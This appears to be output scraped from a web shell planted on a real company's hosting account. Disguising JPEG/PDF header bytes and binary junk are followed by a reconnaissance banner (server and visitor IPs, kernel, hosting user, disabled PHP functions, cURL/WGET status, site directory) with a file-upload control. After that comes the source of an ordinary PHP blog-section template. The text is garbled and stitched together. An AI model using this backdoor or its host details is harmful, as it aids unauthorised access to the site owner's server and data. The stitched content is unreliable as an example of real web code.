ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 82.197.83.129 / Your IP : 216.73.216.166 [ Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64 User : u489457460 ( 489457460) PHP Version : 7.3.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u489457460/domains/syoft.com/public_html/services/ |
Upload File : |
<section class="home-blog-section ptb-60 bg-light "> <div class="container"> <div class="row align-items-center justify-content-between"> <div class="col-lg-7 col-md-12"> <div class="section-heading mb-4" data-aos="fade-up"> <h4 class="text-primary h5"></h4> <span class="crm-subtitle">Blog <img src="../assets/img/shape/arro-right.svg" alt="arrow" class="ms-1"></span> <h2>Check our Latest News and Update</h2> </div> </div> <div class="col-lg-5 col-md-12"> <div class="text-lg-end mb-5 mb-lg-0" data-aos="fade-up"> <a href="/blogs.php" target="_blank" class="btn btn-primary">View All Article</a> </div> </div> </div> <div class="row"> <?php require '../writer/utils.php'; $allposts = getThreeBlogsByCategory($cat_name); foreach ($allposts as $post) { ?> <div class="col-lg-4 col-md-6"> <div class="single-article rounded-custom my-3"> <a href="https://syoft.com/blogs/<?php echo $post["slug"]; ?>" class="article-img"> <img src="https://syoft.com/blogs/uploads/post_images/thumbnails/<?php echo $post["featured_image"]; ?>" alt="article" class="img-fluid"> </a> <div class="article-content p-4"> <!-- <div class="article-category mb-2 d-block"> <a href="javascript:;" class="d-inline-block badge bg-warning"><?php echo $post["category"]; ?></a> </div> --> <a href="https://syoft.com/blogs/<?php echo $post["slug"]; ?>"> <h2 class="h5 article-title limit-2-line-text"><?php echo $post["title"]; ?></h2> </a> <!-- <p class="limit-2-line-text">' . substr($post["desc"], 0, 150) . '</p>--> <div class="row align-items-center py-3 blog-btn bg-light"> <div class="avatar-info col-lg-7 px-4"> <h6 class="mb-0 avatar-name"><?php echo $post["author_name"]; ?></h6> <span class="small text-muted"><i class="far fa-alarm-clock pe-2"></i> <?php echo date('F d, Y', strtotime($post["udate"])); ?></span> </div> <div class="avatar-info-right text-center col-lg-5"> <a href="https://syoft.com/blogs/<?php echo $post["slug"]; ?>"> <button class="read btn btn-warning btn-sm mt-2">Read more</button></a> </div> </div> </div> </div> </div> <?php } ?> </div> </div> </section>